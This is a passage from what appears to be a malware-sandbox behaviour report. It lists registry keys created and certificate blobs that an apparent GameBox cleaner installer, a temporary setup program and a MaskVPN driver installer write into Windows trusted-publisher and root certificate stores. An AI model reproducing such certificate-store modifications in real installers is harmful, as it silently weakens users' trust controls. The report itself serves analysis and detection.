| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ | N/A | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 | C:\Users\Admin\AppData\Local\Temp\is-SS4QK.tmp\Setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c000000010000000400000000100000190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254830400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
